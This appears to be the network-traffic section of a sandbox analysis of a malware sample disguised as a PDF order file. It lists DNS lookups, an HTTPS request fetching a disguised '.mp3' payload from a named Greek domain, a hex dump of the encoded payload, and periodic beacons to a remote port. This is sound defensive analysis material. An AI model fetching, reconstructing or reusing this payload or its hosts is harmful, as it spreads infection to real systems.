                                                                      Nov 18, 2024 08:17:16.328777075 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.328979015 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.329063892 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.329204082 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.329293966 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.329365969 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.329432011 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.329967022 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.330065966 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.330368042 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.330446959 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.330542088 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.330612898 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.330868959 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.330964088 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331119061 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331196070 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331228971 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331299067 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331329107 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331374884 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331398010 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331429005 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331458092 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331465960 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331521988 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331540108 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331621885 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.340900898 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341073036 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341121912 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341145039 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341169119 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341435909 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341454029 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341521025 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341653109 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341730118 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341886997 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341963053 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.342056036 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.342153072 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.349658012 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.349746943 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.390857935 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.390980005 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.391824007 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.391905069 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.392175913 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.392247915 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.392462015 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.392549992 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.393403053 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.393456936 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.393495083 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.393513918 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.393542051 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.393567085 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.432074070 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.432174921 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.432959080 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.433072090 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.433708906 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.433784008 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.433880091 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.433958054 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.443701982 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.443795919 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.443938971 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.444015980 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.444258928 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.444331884 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.444987059 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445061922 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445070982 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445091963 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445120096 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445126057 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445151091 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445163965 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445183992 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445195913 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445235968 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445241928 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445256948 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445301056 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.450417995 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450505972 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.450524092 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450579882 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450650930 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.450664997 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450828075 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450890064 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.450902939 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451037884 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451112986 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451128006 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451209068 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451272964 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451286077 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451371908 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451440096 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451452971 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451836109 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451900005 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451905966 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451921940 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451976061 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451980114 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452016115 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452071905 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452075958 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452088118 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452147007 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452148914 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452161074 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452213049 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452218056 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452229977 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452281952 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452290058 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452301025 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452358007 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452434063 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452511072 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.460148096 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.460227966 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.460243940 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.460268021 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.460330963 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.464380026 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:36.469657898 CET497313791192.168.2.472.11.156.80
                                                                      Nov 18, 2024 08:17:36.475205898 CET37914973172.11.156.80192.168.2.4
                                                                      Nov 18, 2024 08:18:01.485296011 CET497313791192.168.2.472.11.156.80
                                                                      Nov 18, 2024 08:18:01.490317106 CET37914973172.11.156.80192.168.2.4
                                                                      Nov 18, 2024 08:18:26.501065016 CET497313791192.168.2.472.11.156.80
                                                                      Nov 18, 2024 08:18:26.505974054 CET37914973172.11.156.80192.168.2.4
                                                                      Nov 18, 2024 08:18:51.516860962 CET497313791192.168.2.472.11.156.80
                                                                      Nov 18, 2024 08:18:51.521948099 CET37914973172.11.156.80192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 18, 2024 08:16:59.584736109 CET6089853192.168.2.41.1.1.1
                                                                      Nov 18, 2024 08:16:59.828737974 CET53608981.1.1.1192.168.2.4
                                                                      Nov 18, 2024 08:17:05.470633984 CET6366753192.168.2.41.1.1.1
                                                                      Nov 18, 2024 08:17:05.751359940 CET53636671.1.1.1192.168.2.4
                                                                      Nov 18, 2024 08:17:08.153294086 CET5194353192.168.2.41.1.1.1
                                                                      Nov 18, 2024 08:17:08.161777973 CET53519431.1.1.1192.168.2.4
                                                                      Nov 18, 2024 08:17:45.384815931 CET5362662162.159.36.2192.168.2.4
                                                                      Nov 18, 2024 08:17:46.029077053 CET53548321.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 18, 2024 08:16:59.584736109 CET192.168.2.41.1.1.10x114fStandard query (0)www.oleonidas.grA (IP address)IN (0x0001)false
                                                                      Nov 18, 2024 08:17:05.470633984 CET192.168.2.41.1.1.10x61fcStandard query (0)new-visit.comA (IP address)IN (0x0001)false
                                                                      Nov 18, 2024 08:17:08.153294086 CET192.168.2.41.1.1.10x712cStandard query (0)ipwho.isA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 18, 2024 08:16:59.828737974 CET1.1.1.1192.168.2.40x114fNo error (0)www.oleonidas.groleonidas.grCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 18, 2024 08:16:59.828737974 CET1.1.1.1192.168.2.40x114fNo error (0)oleonidas.gr185.78.221.73A (IP address)IN (0x0001)false
                                                                      Nov 18, 2024 08:17:05.751359940 CET1.1.1.1192.168.2.40x61fcNo error (0)new-visit.com72.11.156.80A (IP address)IN (0x0001)false
                                                                      Nov 18, 2024 08:17:07.147557974 CET1.1.1.1192.168.2.40x993bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                      Nov 18, 2024 08:17:07.147557974 CET1.1.1.1192.168.2.40x993bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                      Nov 18, 2024 08:17:08.161777973 CET1.1.1.1192.168.2.40x712cNo error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • www.oleonidas.gr
                                                                      • ipwho.is

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449730185.78.221.73443180C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-18 07:17:00 UTC86OUTGET /slim/Wyaiccfynhd.mp3 HTTP/1.1
                                                                      Host: www.oleonidas.gr
                                                                      Connection: Keep-Alive
                                                                      2024-11-18 07:17:01 UTC300INHTTP/1.1 200 OK
                                                                      Date: Mon, 18 Nov 2024 07:17:01 GMT
                                                                      Server: Apache
                                                                      Last-Modified: Mon, 18 Nov 2024 00:17:26 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 2120192
                                                                      Cache-Control: max-age=1209600
                                                                      Expires: Mon, 02 Dec 2024 07:17:01 GMT
                                                                      Vary: User-Agent
                                                                      Connection: close
                                                                      Content-Type: audio/mpeg
                                                                      2024-11-18 07:17:01 UTC7892INData Raw: 7c 6b a0 31 32 30 31 31 34 31 31 30 ce ce 30 31 89 30 31 31 30 31 31 30 71 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 b1 31 30 31 3f 2f 8b 3f 30 85 38 fd 10 89 31 7d fc 11 65 59 59 42 11 40 43 5e 57 43 50 5d 11 52 51 5f 5f 5f 45 11 52 54 11 42 44 5f 10 58 5f 10 75 7e 63 11 5c 5f 55 54 1e 3c 3c 3a 15 31 30 31 31 30 31 31 60 74 31 30 7d 30 33 31 1b eb 7b 8a 30 31 31 30 31 31 30 31 d1 30 3f 10 3b 30 01 30 31 63 10 31 31 36 31 31 30 31 31 30 cf 41 10 31 31 10 31 31 30 b1 11 30 31 31 70 31 31 10 31 31 30 33 31 30 35 31 30 31 31 30 31 31 34 31 31 30 31 31 30 31 31 f0 11 31 30 33 31 30 31 31 30 31 32 30 71 b4 30 31 21 30 31 21 30 31 31 30 21 31 30 21 31 30 31 31 30 31 3e 30 31 31 30 31 31 30 31 31 30
                                                                      Data Ascii: |k120114110010110110q10110110110110110110110110110110110101?/?081}eYYB@C^WCP]RQ___ERTBD_X_u~c\_UT<<:1011011`t10}031{011011010?;001c116110110A11110011p111103105101101141101101110310110120q01!01!0110!10!101101>0110110110
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: a7 ce ce cf 23 31 30 26 1b 30 31 31 22 31 31 24 1b 31 30 31 23 30 31 26 1a 31 31 30 22 01 33 31 35 30 31 31 30 31 31 30 31 31 30 1b 23 30 31 25 1a 31 31 30 22 01 33 31 35 30 31 31 30 31 31 30 31 31 30 1b 23 30 31 26 1a 31 31 30 22 01 33 31 35 30 31 31 30 31 31 30 31 31 30 1b 13 30 25 94 77 31 31 32 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 24 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 24 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 24 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 24 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 26 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 23 01 32 30 35 31 30 31 31 30 31 31 30 31 31
                                                                      Data Ascii: #10&011"11$101#01&110"3150110110110#01%110"3150110110110#01&110"31501101101100%w112101"2141101101101"11$101"2141101101101"11$101"2141101101101"11$101"2141101101101"11$101"2141101101101"11&101"2141101101101#2051011011011
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: 11 30 31 31 30 09 f0 cf ce ce 1a 4f a8 32 31 35 18 64 36 30 37 11 31 31 31 30 4f b2 32 31 35 4b 1e 33 30 35 08 92 ce ce cf 17 11 30 31 31 30 09 a6 cf ce ce 22 31 31 27 1b 31 30 31 23 30 31 25 1a 31 31 30 32 01 38 31 35 30 31 31 30 31 31 30 31 31 30 1b 70 2c 31 31 30 31 31 30 d4 31 30 31 55 31 31 31 79 33 31 30 09 31 30 31 26 30 31 30 23 01 32 30 b1 31 30 31 30 30 31 20 18 91 33 30 37 11 31 31 31 30 cf 3f 30 31 09 30 31 31 30 cf 3d 30 31 74 33 31 31 30 34 31 30 31 1e 30 31 31 1e 31 31 30 09 31 30 31 31 4e ab 33 30 35 19 69 36 31 36 11 33 30 31 31 4e b2 33 30 35 4a b7 33 31 34 0b fd cf ce ce 16 11 31 30 31 31 08 f0 ce cf ce 1b 4e a8 33 30 35 19 65 36 31 36 11 31 30 31 31 4e b2 33 30 35 4a 57 33 31 34 0b 93 cf ce ce 16 11 31 30 31 31 08 a6 ce cf ce 23 30 31
                                                                      Data Ascii: 0110O215d6071110O215K3050110"11'101#01%11028150110110110p,110110101U111y310101&010#20101001 3071110?010110=01t311041010111101011N305i6163011N305J3141011N305e6161011N305JW3141011#01
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: 2e 72 30 11 26 30 31 30 30 31 29 30 3a 12 30 74 26 30 31 30 2b 01 33 30 1f 31 30 31 31 30 31 31 43 0a 31 30 3b 17 ed 3d 31 30 31 17 27 b1 49 31 31 35 ed 27 31 30 31 31 18 5c 31 30 3b b1 48 30 31 34 ec 37 30 31 31 16 ec 31 30 31 31 1a 31 31 31 2d 31 30 31 31 30 31 3a 3b 31 3d 27 31 31 31 31 31 28 31 3e 17 31 37 27 31 31 31 47 19 bd 33 31 36 0b 3d 30 31 31 43 0a 31 30 3b 33 18 5f 31 30 3b 1b 32 19 b6 32 31 37 1a 31 31 23 01 34 30 09 31 30 31 30 30 31 20 08 1a 31 30 31 35 35 bf 58 72 37 31 30 31 35 08 32 31 30 31 34 be 58 3b 33 34 27 36 5e 0e 30 31 3b 16 33 34 26 37 19 a4 33 31 36 35 37 69 21 33 34 27 73 fe ce ce cf 1b 07 32 32 35 35 32 35 5f 5e 31 30 3b 17 1a 31 31 23 01 34 30 6b 31 30 31 7c 30 31 20 26 3b 09 7a 31 31 30 34 5e 40 31 31 3a 35 37 2f 19 6b 2e
                                                                      Data Ascii: .r0&01001)0:0t&010+301011011C10;=101'I115'1011\10;H01470111011111-101101:;1='11111(1>17'111G316=011C10;3_10;221711#40101001 10155Xr7101521014X;34'6^01;34&731657i!34's225525_^10;11#40k101|01 &;z1104^@11:57/k.
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: 32 31 37 10 2a 31 30 31 09 2d cd ce cf 20 38 21 1a 5f 68 22 20 10 16 31 30 31 09 3b cd ce cf 20 32 21 3c 11 a8 31 31 30 20 3e 18 d7 33 30 37 11 12 31 31 30 09 c0 cb ce ce 08 81 cf cf ce 11 3c 31 31 30 19 c6 32 31 37 0a ec ca cf ce 17 10 39 31 30 31 09 e2 ca ce cf 20 2b 21 2e 0d 90 cf ce cf 11 27 30 31 31 08 8e ca cf ce 20 2a 26 69 23 2b 11 30 31 31 30 19 c9 32 31 37 0a 9b ca cf ce 17 10 25 31 30 31 09 af ca ce cf 20 39 18 da 33 30 37 20 2f 20 34 21 39 19 dc 33 31 36 22 33 10 33 31 30 31 cf 3e 22 31 08 48 ca cf ce 11 30 31 30 30 bc 2d 30 31 30 23 3e 11 13 31 31 30 09 56 cb ce ce 08 f2 ce cf ce 11 35 31 31 30 09 69 cb ce ce 21 39 20 1b 19 de 32 31 37 23 23 11 23 31 31 30 19 c6 32 31 37 0a 0f ca cf ce 17 10 21 31 30 31 09 03 ca ce cf 09 c3 cd ce ce 10 17 31
                                                                      Data Ascii: 217*101- 8!_h" 101; 2!<110 >307110<1102179101 +!.'011 *&i#+0110217%101 9307 / 4!9316"33101>"1H0100-010#>110V5110i!9 217###110217!1011
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: 11 14 31 31 30 11 6e 30 31 31 68 cf 3f 27 31 11 b4 33 31 30 19 62 33 31 37 0a ed de cf ce 17 10 41 33 30 31 09 e1 de ce cf 11 43 30 31 31 10 03 31 30 31 69 ce 3f 26 30 11 cf 31 31 31 18 62 32 30 37 0b 83 de ce cf 17 11 af 30 31 30 09 99 df ce ce ce 3d 57 30 11 2f 30 31 31 10 b8 31 30 31 11 1d 31 31 30 68 ad 10 5e 30 30 31 cf 3e 11 31 08 b0 de cf ce cf 3c 57 31 10 23 31 30 31 11 60 31 31 30 11 5e 30 31 31 68 ad 11 78 30 31 30 09 57 df ce ce 21 61 2b 70 1b 1e 30 31 11 c3 30 31 30 09 65 df ce ce ce 3d 57 30 11 32 30 31 31 10 2f 31 30 31 11 2c 31 31 30 69 ad 10 67 33 30 31 09 05 de ce cf 20 16 28 2e 45 ac 11 13 30 31 31 08 14 de cf ce 2e 2e bc 2d 30 31 30 15 e1 19 32 31 35 18 61 32 30 37 22 13 11 b2 30 31 31 ce 3f 11 30 09 ce de ce ce ce 3d 28 30 11 33 30 31
                                                                      Data Ascii: 110n011h?'1310b317A301C011101i?&0111b207010=W0/011101110h^001>1<W1#101`110^011hx010W!a+p01010e=W02011/101,110ig301 (.E011..-010215a207"011?0=(0301
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: cd ce cf ec 3d 38 31 31 16 11 31 30 31 31 18 65 32 30 37 0b 3f 31 31 30 17 11 30 31 31 30 09 35 30 31 31 ce 3d 41 30 74 30 30 31 31 35 31 31 30 09 31 30 31 31 ed eb 36 30 31 11 26 33 31 30 cf 3f 10 31 09 5e e1 ce cf 27 22 0e 11 2b 32 31 31 18 62 32 30 37 08 50 e1 ce cf 17 11 69 33 31 30 09 64 e0 ce ce 30 09 4a 30 31 31 10 31 31 30 31 19 63 32 31 36 0b 3e 30 31 31 16 11 31 30 31 31 08 35 31 30 31 cf 3c 7a 31 75 3c 31 30 31 58 30 31 31 98 30 31 30 34 31 30 31 8c 30 31 31 91 31 31 30 7b 31 30 31 a0 30 31 31 02 30 31 30 e1 31 30 31 15 30 31 31 dd 31 31 30 42 30 30 31 3b 31 31 31 08 55 31 30 31 09 2a 31 31 30 11 33 30 31 31 18 65 32 30 37 0b 9e ce ce cf 17 11 36 31 31 30 09 92 cf ce ce 21 79 19 29 32 31 36 0b 08 30 31 31 10 31 31 30 31 19 63 32 31 36 08 b9 cf
                                                                      Data Ascii: =8111011e207?11001105011=A0t001151101011601&310?1^'"+211b207Pi310d0J0111101c216>01110115101<z1u<101X0110104101011110{101011010101011110B001;111U101*1103011e2076110!y)2160111101c216
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: 30 09 45 81 ce ce 21 59 20 23 28 69 a1 2e 29 52 20 59 21 22 29 68 a0 2e 20 53 51 21 59 20 23 26 69 a1 2f 53 50 20 59 21 22 a0 50 22 1d 10 c8 30 30 31 09 73 80 ce cf 20 24 be 58 bc 2c 31 31 31 22 78 10 18 31 30 31 19 63 32 31 36 08 18 81 ce ce 16 11 9c 31 31 31 08 2f 80 cf ce 20 20 2e 38 21 68 2b a1 ad 11 92 30 31 30 19 65 33 31 37 09 37 80 cf ce 17 10 19 31 30 31 09 cb 81 ce cf 20 07 2b 2e 45 ac 11 be 31 31 31 18 62 32 30 37 08 d6 81 ce cf 17 11 6d 33 31 30 09 ea 80 ce ce 26 22 06 10 55 33 30 31 09 fe 81 ce cf 11 ea 30 31 31 10 78 31 30 31 68 ce 3f 26 30 11 3d 30 31 31 08 84 81 cf ce 11 fe 31 31 30 11 75 30 31 31 69 cf 3f 08 31 11 71 33 31 30 09 ad 80 ce ce 10 2a 31 30 31 11 21 31 31 30 69 cf 3e 26 31 10 32 31 30 31 19 63 32 31 36 08 4f 80 ce ce 16 11 a8
                                                                      Data Ascii: 0E!Y #(i.)R Y!")h. SQ!Y #&i/SP Y!"P"001s $X,111"x101c216111/ .8!h+010e3177101 +.E111b207m310&"U301011x101h?&0=011110u011i?1q310*101!110i>&12101c216O
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: 31 ce 38 33 30 5e fa 30 31 3b 1a 31 2f 30 19 9d 32 31 37 1a 6b cf 39 31 31 ce 38 30 30 cf 38 32 31 cf 39 32 31 5f 69 31 30 3b 1b 30 1b cf 39 31 31 5f fd 31 30 3b 1b 30 1f 31 ce 38 31 30 19 9c 32 31 37 1a 1b cf 39 31 31 5f f7 31 30 3b 1b 30 1b cf 39 31 31 5f fc 31 30 3b 1b 30 0f 31 ce 38 31 30 cf 38 31 31 19 fe 31 31 3a 1b 27 24 25 cf 31 1b 31 30 3b 25 1a 31 2f 30 19 90 33 31 37 1a 1f 31 ce 38 31 30 19 57 30 31 3b 1a 1f 31 ce 38 31 30 19 50 30 31 3b 1a 1b cf 39 31 31 5f 88 31 30 3b 1b 30 1b cf 39 31 31 5f f6 31 30 3b 1b 30 2f 31 18 fe 31 30 3b 1b 1e 31 cf 39 31 31 18 e1 31 30 3b 1b 1e 31 cf 39 31 31 18 8b 31 30 3b 1b 0a cf 38 30 31 cf 39 30 31 5f 73 31 30 3b 1b 30 1b cf 39 31 31 5f 49 32 30 37 1b 30 0b cf 39 31 31 ce 38 30 30 5e 6a 30 31 3b 1a 31 1b ce 38
                                                                      Data Ascii: 1830^01;1/0217k911800821921_i10;0911_10;01810217911_10;0911_10;0181081111:'$%110;%1/03171810W01;1810P01;911_10;0911_10;0/110;191110;191110;801901_s10;0911_I2070911800^j01;18
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: 31 11 0c 31 31 30 68 ad 10 93 30 30 31 09 03 dd ce cf cf 3d 14 31 11 3b 31 31 30 11 ff 30 31 31 10 75 31 30 31 68 ac 11 30 31 31 31 08 25 dd cf ce cf 3c 15 31 10 26 31 30 31 cf 3c 13 31 ac 11 da 30 31 31 08 cd da cf ce 20 24 26 69 23 25 11 5a 31 31 30 cf 3f 33 31 09 d4 da ce cf 11 a3 30 31 31 10 10 31 30 31 69 ce 3f 13 30 11 b6 30 31 31 18 8e 32 30 37 08 fa da ce cf 17 11 1f 31 31 30 09 8e db ce ce ce 3d 15 30 11 2a 30 31 31 10 21 31 30 31 11 3d 31 31 30 68 ad 10 7b 31 30 31 09 90 da ce cf cf 3d 14 31 11 24 31 31 30 cf 3d 12 31 ad 10 88 31 30 31 09 b8 da ce cf cf 3d 14 31 11 2e 31 31 30 11 f2 30 31 31 10 70 31 30 31 68 ac 11 18 30 31 31 08 58 da cf ce 11 43 31 31 30 11 7b 30 31 31 68 cf 3f 12 31 11 18 31 31 30 19 8f 33 31 37 09 7a da cf ce 17 10 73 31 30
                                                                      Data Ascii: 1110h001=1;110011u101h0111%<1&101<1011 $&i#%Z110?31011101i?0011207110=0*011!101=110h{101=1$110=1101=1.110011p101h011XC110{011h?1110317zs10


